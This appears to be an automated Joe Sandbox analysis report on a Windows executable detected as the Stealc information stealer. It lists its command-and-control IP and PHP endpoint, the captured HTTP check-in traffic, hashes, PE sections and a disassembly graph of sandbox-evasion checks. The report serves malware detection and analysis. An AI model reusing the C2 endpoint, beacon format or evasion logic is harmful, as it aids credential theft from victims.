                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37file.exe, 00000000.00000002.1729629409.000000000120E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729629409.0000000001269000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phpHRPbfile.exe, 00000000.00000002.1729629409.0000000001289000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37vfile.exe, 00000000.00000002.1729629409.000000000120E000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/wsfile.exe, 00000000.00000002.1729629409.0000000001269000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.phpSfile.exe, 00000000.00000002.1729629409.0000000001269000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.php7b0923665da6f1file.exe, 00000000.00000002.1729629409.0000000001269000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          185.215.113.37
                          		unknownPortugal
                          		206894WHOLESALECONNECTIONSNLtrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1525663
                          Start date and time:2024-10-04 13:50:09 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 3m 6s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:1
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 80%
                          • Number of executed functions: 19
                          • Number of non-executed functions: 81
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated

                          Warnings

                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: file.exe

                          Simulations

                          Behavior and APIs

                          No simulations

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          185.215.113.37file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          Aura.exeGet hashmaliciousRedLineBrowse
                          • 185.215.113.22
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          No created / dropped files found

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.95017628517817
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:1'897'472 bytes
                          MD5:1840b3a6769699f03fca969af6b4e883
                          SHA1:53eeeb33aec86d2f03dc021351ffb61c1118aadd
                          SHA256:247b59e9bb5df7c640981d51f2df6fd618414f802f3ce049c6fb469cf8a3a66d
                          SHA512:1f613584583dc086641a695bf72201ea5603451639e5ad0d51abfe2aeeffce7d6dc38aba3842c60dcceccbb4defbd7daa4d39c6201b972a0e9dc2a0472380169
                          SSDEEP:49152:XVhOA/35Dbb1R2kI3p8gOXyYHEe8z2K4OOergm:rOA/pnbj2kI3p8Nrke+2cAm
                          TLSH:389533C280DCCFAECE2D6CF37C29116B8EE4900985BB1E7DFDA37D18556D5224C6A620
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                          File Icon

                          Icon Hash:90cececece8e8eb0

                          Static PE Info

                          General

                          Entrypoint:0xabd000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b

                          Entrypoint Preview

                          Instruction
                          jmp 00007F8B14DBEB6Ah
                          psrld mm3, qword ptr [eax+eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          jmp 00007F8B14DC0B65h
                          add byte ptr [edi], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], dl
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [edx+ecx], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          or byte ptr [eax+00000000h], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          pop es
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], dh
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add bh, bh

                          Rich Headers

                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          0x10000x25b0000x22800c2747ffde476791b11faee6619872defunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          0x25e0000x2b50000x20001efdba24b8f99fdbb74b96013945012unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          zlzhjqsn0x5130000x1a90000x1a90008536d09a707293481633cc516631cafaFalse0.9950953584558824data7.955253982546698IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          kjlhrbah0x6bc0000x10000x6007417d4dcd38090a4651ef93b8bed586fFalse0.5677083333333334data5.052038320943938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .taggant0x6bd0000x30000x22005c49124b496c89b062cbbc133c112508False0.05893841911764706DOS executable (COM)0.6682336934896633IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                          Imports

                          DLLImport
                          kernel32.dlllstrcpy

                          Network Behavior

                          Suricata IDS Alerts

                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-10-04T13:51:06.058208+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Oct 4, 2024 13:51:05.079921961 CEST4973080192.168.2.4185.215.113.37
                          Oct 4, 2024 13:51:05.085021973 CEST8049730185.215.113.37192.168.2.4
                          Oct 4, 2024 13:51:05.085135937 CEST4973080192.168.2.4185.215.113.37
                          Oct 4, 2024 13:51:05.085283041 CEST4973080192.168.2.4185.215.113.37
                          Oct 4, 2024 13:51:05.090166092 CEST8049730185.215.113.37192.168.2.4
                          Oct 4, 2024 13:51:05.811203003 CEST8049730185.215.113.37192.168.2.4
                          Oct 4, 2024 13:51:05.811409950 CEST4973080192.168.2.4185.215.113.37
                          Oct 4, 2024 13:51:05.815990925 CEST4973080192.168.2.4185.215.113.37
                          Oct 4, 2024 13:51:05.824296951 CEST8049730185.215.113.37192.168.2.4
                          Oct 4, 2024 13:51:06.058079958 CEST8049730185.215.113.37192.168.2.4
                          Oct 4, 2024 13:51:06.058207989 CEST4973080192.168.2.4185.215.113.37
                          Oct 4, 2024 13:51:08.078217983 CEST4973080192.168.2.4185.215.113.37

                          HTTP Request Dependency Graph

                          • 185.215.113.37

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.449730185.215.113.37807400C:\Users\user\Desktop\file.exe
                          TimestampBytes transferredDirectionData
                          Oct 4, 2024 13:51:05.085283041 CEST89OUTGET / HTTP/1.1
                          Host: 185.215.113.37
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Oct 4, 2024 13:51:05.811203003 CEST203INHTTP/1.1 200 OK
                          Date: Fri, 04 Oct 2024 11:51:05 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Oct 4, 2024 13:51:05.815990925 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----AKKECAFBFHJDGDHIEHJD
                          Host: 185.215.113.37
                          Content-Length: 211
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 33 42 44 43 44 38 41 33 44 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 2d 2d 0d 0a
                          Data Ascii: ------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="hwid"53BDCD8A3D9D1524750037------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="build"doma------AKKECAFBFHJDGDHIEHJD--
                          Oct 4, 2024 13:51:06.058079958 CEST210INHTTP/1.1 200 OK
                          Date: Fri, 04 Oct 2024 11:51:05 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Content-Length: 8
                          Keep-Alive: timeout=5, max=99
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 59 6d 78 76 59 32 73 3d
                          Data Ascii: YmxvY2s=


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          System Behavior

                          General

                          Target ID:0
                          Start time:07:51:00
                          Start date:04/10/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
                          Imagebase:0xe0000
                          File size:1'897'472 bytes
                          MD5 hash:1840B3A6769699F03FCA969AF6B4E883
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1729629409.000000000120E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1688759783.0000000005130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:8.6%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:9.7%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:24
                            execution_graph 13407 f69f0 13452 e2260 13407->13452 13431 f6a64 13432 fa9b0 4 API calls 13431->13432 13433 f6a6b 13432->13433 13434 fa9b0 4 API calls 13433->13434 13435 f6a72 13434->13435 13436 fa9b0 4 API calls 13435->13436 13437 f6a79 13436->13437 13438 fa9b0 4 API calls 13437->13438 13439 f6a80 13438->13439 13604 fa8a0 13439->13604 13441 f6b0c 13608 f6920 GetSystemTime 13441->13608 13442 f6a89 13442->13441 13444 f6ac2 OpenEventA 13442->13444 13446 f6ad9 13444->13446 13447 f6af5 CloseHandle Sleep 13444->13447 13451 f6ae1 CreateEventA 13446->13451 13449 f6b0a 13447->13449 13449->13442 13451->13441 13805 e45c0 13452->13805 13454 e2274 13455 e45c0 2 API calls 13454->13455 13456 e228d 13455->13456 13457 e45c0 2 API calls 13456->13457 13458 e22a6 13457->13458 13459 e45c0 2 API calls 13458->13459 13460 e22bf 13459->13460 13461 e45c0 2 API calls 13460->13461 13462 e22d8 13461->13462 13463 e45c0 2 API calls 13462->13463 13464 e22f1 13463->13464 13465 e45c0 2 API calls 13464->13465 13466 e230a 13465->13466 13467 e45c0 2 API calls 13466->13467 13468 e2323 13467->13468 13469 e45c0 2 API calls 13468->13469 13470 e233c 13469->13470 13471 e45c0 2 API calls 13470->13471 13472 e2355 13471->13472 13473 e45c0 2 API calls 13472->13473 13474 e236e 13473->13474 13475 e45c0 2 API calls 13474->13475 13476 e2387 13475->13476 13477 e45c0 2 API calls 13476->13477 13478 e23a0 13477->13478 13479 e45c0 2 API calls 13478->13479 13480 e23b9 13479->13480 13481 e45c0 2 API calls 13480->13481 13482 e23d2 13481->13482 13483 e45c0 2 API calls 13482->13483 13484 e23eb 13483->13484 13485 e45c0 2 API calls 13484->13485 13486 e2404 13485->13486 13487 e45c0 2 API calls 13486->13487 13488 e241d 13487->13488 13489 e45c0 2 API calls 13488->13489 13490 e2436 13489->13490 13491 e45c0 2 API calls 13490->13491 13492 e244f 13491->13492 13493 e45c0 2 API calls 13492->13493 13494 e2468 13493->13494 13495 e45c0 2 API calls 13494->13495 13496 e2481 13495->13496 13497 e45c0 2 API calls 13496->13497 13498 e249a 13497->13498 13499 e45c0 2 API calls 13498->13499 13500 e24b3 13499->13500 13501 e45c0 2 API calls 13500->13501 13502 e24cc 13501->13502 13503 e45c0 2 API calls 13502->13503 13504 e24e5 13503->13504 13505 e45c0 2 API calls 13504->13505 13506 e24fe 13505->13506 13507 e45c0 2 API calls 13506->13507 13508 e2517 13507->13508 13509 e45c0 2 API calls 13508->13509 13510 e2530 13509->13510 13511 e45c0 2 API calls 13510->13511 13512 e2549 13511->13512 13513 e45c0 2 API calls 13512->13513 13514 e2562 13513->13514 13515 e45c0 2 API calls 13514->13515 13516 e257b 13515->13516 13517 e45c0 2 API calls 13516->13517 13518 e2594 13517->13518 13519 e45c0 2 API calls 13518->13519 13520 e25ad 13519->13520 13521 e45c0 2 API calls 13520->13521 13522 e25c6 13521->13522 13523 e45c0 2 API calls 13522->13523 13524 e25df 13523->13524 13525 e45c0 2 API calls 13524->13525 13526 e25f8 13525->13526 13527 e45c0 2 API calls 13526->13527 13528 e2611 13527->13528 13529 e45c0 2 API calls 13528->13529 13530 e262a 13529->13530 13531 e45c0 2 API calls 13530->13531 13532 e2643 13531->13532 13533 e45c0 2 API calls 13532->13533 13534 e265c 13533->13534 13535 e45c0 2 API calls 13534->13535 13536 e2675 13535->13536 13537 e45c0 2 API calls 13536->13537 13538 e268e 13537->13538 13539 f9860 13538->13539 13810 f9750 GetPEB 13539->13810 13541 f9868 13542 f987a 13541->13542 13543 f9a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13541->13543 13546 f988c 21 API calls 13542->13546 13544 f9b0d 13543->13544 13545 f9af4 GetProcAddress 13543->13545 13547 f9b46 13544->13547 13548 f9b16 GetProcAddress GetProcAddress 13544->13548 13545->13544 13546->13543 13549 f9b4f GetProcAddress 13547->13549 13550 f9b68 13547->13550 13548->13547 13549->13550 13551 f9b89 13550->13551 13552 f9b71 GetProcAddress 13550->13552 13553 f9b92 GetProcAddress GetProcAddress 13551->13553 13554 f6a00 13551->13554 13552->13551 13553->13554 13555 fa740 13554->13555 13556 fa750 13555->13556 13557 f6a0d 13556->13557 13558 fa77e lstrcpy 13556->13558 13559 e11d0 13557->13559 13558->13557 13560 e11e8 13559->13560 13561 e120f ExitProcess 13560->13561 13562 e1217 13560->13562 13563 e1160 GetSystemInfo 13562->13563 13564 e117c ExitProcess 13563->13564 13565 e1184 13563->13565 13566 e1110 GetCurrentProcess VirtualAllocExNuma 13565->13566 13567 e1149 13566->13567 13568 e1141 ExitProcess 13566->13568 13811 e10a0 VirtualAlloc 13567->13811 13571 e1220 13815 f89b0 13571->13815 13574 e129a 13577 f6770 GetUserDefaultLangID 13574->13577 13575 e1249 __aulldiv 13575->13574 13576 e1292 ExitProcess 13575->13576 13578 f67d3 13577->13578 13579 f6792 13577->13579 13585 e1190 13578->13585 13579->13578 13580 f67ad ExitProcess 13579->13580 13581 f67cb ExitProcess 13579->13581 13582 f67b7 ExitProcess 13579->13582 13583 f67a3 ExitProcess 13579->13583 13584 f67c1 ExitProcess 13579->13584 13586 f78e0 3 API calls 13585->13586 13587 e119e 13586->13587 13588 e11cc 13587->13588 13589 f7850 3 API calls 13587->13589 13592 f7850 GetProcessHeap RtlAllocateHeap GetUserNameA 13588->13592 13590 e11b7 13589->13590 13590->13588 13591 e11c4 ExitProcess 13590->13591 13593 f6a30 13592->13593 13594 f78e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13593->13594 13595 f6a43 13594->13595 13596 fa9b0 13595->13596 13817 fa710 13596->13817 13598 fa9c1 lstrlen 13601 fa9e0 13598->13601 13599 faa18 13818 fa7a0 13599->13818 13601->13599 13603 fa9fa lstrcpy lstrcat 13601->13603 13602 faa24 13602->13431 13603->13599 13605 fa8bb 13604->13605 13606 fa90b 13605->13606 13607 fa8f9 lstrcpy 13605->13607 13606->13442 13607->13606 13822 f6820 13608->13822 13610 f698e 13611 f6998 sscanf 13610->13611 13851 fa800 13611->13851 13613 f69aa SystemTimeToFileTime SystemTimeToFileTime 13614 f69ce 13613->13614 13615 f69e0 13613->13615 13614->13615 13616 f69d8 ExitProcess 13614->13616 13617 f5b10 13615->13617 13618 f5b1d 13617->13618 13619 fa740 lstrcpy 13618->13619 13620 f5b2e 13619->13620 13853 fa820 lstrlen 13620->13853 13623 fa820 2 API calls 13624 f5b64 13623->13624 13625 fa820 2 API calls 13624->13625 13626 f5b74 13625->13626 13857 f6430 13626->13857 13629 fa820 2 API calls 13630 f5b93 13629->13630 13631 fa820 2 API calls 13630->13631 13632 f5ba0 13631->13632 13633 fa820 2 API calls 13632->13633 13634 f5bad 13633->13634 13635 fa820 2 API calls 13634->13635 13636 f5bf9 13635->13636 13866 e26a0 13636->13866 13644 f5cc3 13645 f6430 lstrcpy 13644->13645 13646 f5cd5 13645->13646 13647 fa7a0 lstrcpy 13646->13647 13648 f5cf2 13647->13648 13649 fa9b0 4 API calls 13648->13649 13650 f5d0a 13649->13650 13651 fa8a0 lstrcpy 13650->13651 13652 f5d16 13651->13652 13653 fa9b0 4 API calls 13652->13653 13654 f5d3a 13653->13654 13655 fa8a0 lstrcpy 13654->13655 13656 f5d46 13655->13656 13657 fa9b0 4 API calls 13656->13657 13658 f5d6a 13657->13658 13659 fa8a0 lstrcpy 13658->13659 13660 f5d76 13659->13660 13661 fa740 lstrcpy 13660->13661 13662 f5d9e 13661->13662 14592 f7500 GetWindowsDirectoryA 13662->14592 13665 fa7a0 lstrcpy 13666 f5db8 13665->13666 14602 e4880 13666->14602 13668 f5dbe 14747 f17a0 13668->14747 13670 f5dc6 13671 fa740 lstrcpy 13670->13671 13672 f5de9 13671->13672 13673 e1590 lstrcpy 13672->13673 13674 f5dfd 13673->13674 14763 e5960 13674->14763 13676 f5e03 14907 f1050 13676->14907 13678 f5e0e 13679 fa740 lstrcpy 13678->13679 13680 f5e32 13679->13680 13681 e1590 lstrcpy 13680->13681 13682 f5e46 13681->13682 13683 e5960 34 API calls 13682->13683 13684 f5e4c 13683->13684 14911 f0d90 13684->14911 13686 f5e57 13687 fa740 lstrcpy 13686->13687 13688 f5e79 13687->13688 13689 e1590 lstrcpy 13688->13689 13690 f5e8d 13689->13690 13691 e5960 34 API calls 13690->13691 13692 f5e93 13691->13692 14918 f0f40 13692->14918 13694 f5e9e 13695 e1590 lstrcpy 13694->13695 13696 f5eb5 13695->13696 14923 f1a10 13696->14923 13698 f5eba 13699 fa740 lstrcpy 13698->13699 13700 f5ed6 13699->13700 15267 e4fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13700->15267 13702 f5edb 13703 e1590 lstrcpy 13702->13703 13704 f5f5b 13703->13704 15274 f0740 13704->15274 13706 f5f60 13707 fa740 lstrcpy 13706->13707 13708 f5f86 13707->13708 13709 e1590 lstrcpy 13708->13709 13710 f5f9a 13709->13710 13711 e5960 34 API calls 13710->13711 13712 f5fa0 13711->13712 15327 f1170 13712->15327 13806 e45d1 RtlAllocateHeap 13805->13806 13808 e4621 VirtualProtect 13806->13808 13808->13454 13810->13541 13813 e10c2 codecvt 13811->13813 13812 e10fd 13812->13571 13813->13812 13814 e10e2 VirtualFree 13813->13814 13814->13812 13816 e1233 GlobalMemoryStatusEx 13815->13816 13816->13575 13817->13598 13819 fa7c2 13818->13819 13820 fa7ec 13819->13820 13821 fa7da lstrcpy 13819->13821 13820->13602 13821->13820 13823 fa740 lstrcpy 13822->13823 13824 f6833 13823->13824 13825 fa9b0 4 API calls 13824->13825 13826 f6845 13825->13826 13827 fa8a0 lstrcpy 13826->13827 13828 f684e 13827->13828 13829 fa9b0 4 API calls 13828->13829 13830 f6867 13829->13830 13831 fa8a0 lstrcpy 13830->13831 13832 f6870 13831->13832 13833 fa9b0 4 API calls 13832->13833 13834 f688a 13833->13834 13835 fa8a0 lstrcpy 13834->13835 13836 f6893 13835->13836 13837 fa9b0 4 API calls 13836->13837 13838 f68ac 13837->13838 13839 fa8a0 lstrcpy 13838->13839 13840 f68b5 13839->13840 13841 fa9b0 4 API calls 13840->13841 13842 f68cf 13841->13842 13843 fa8a0 lstrcpy 13842->13843 13844 f68d8 13843->13844 13845 fa9b0 4 API calls 13844->13845 13846 f68f3 13845->13846 13847 fa8a0 lstrcpy 13846->13847 13848 f68fc 13847->13848 13849 fa7a0 lstrcpy 13848->13849 13850 f6910 13849->13850 13850->13610 13852 fa812 13851->13852 13852->13613 13855 fa83f 13853->13855 13854 f5b54 13854->13623 13855->13854 13856 fa87b lstrcpy 13855->13856 13856->13854 13858 fa8a0 lstrcpy 13857->13858 13859 f6443 13858->13859 13860 fa8a0 lstrcpy 13859->13860 13861 f6455 13860->13861 13862 fa8a0 lstrcpy 13861->13862 13863 f6467 13862->13863 13864 fa8a0 lstrcpy 13863->13864 13865 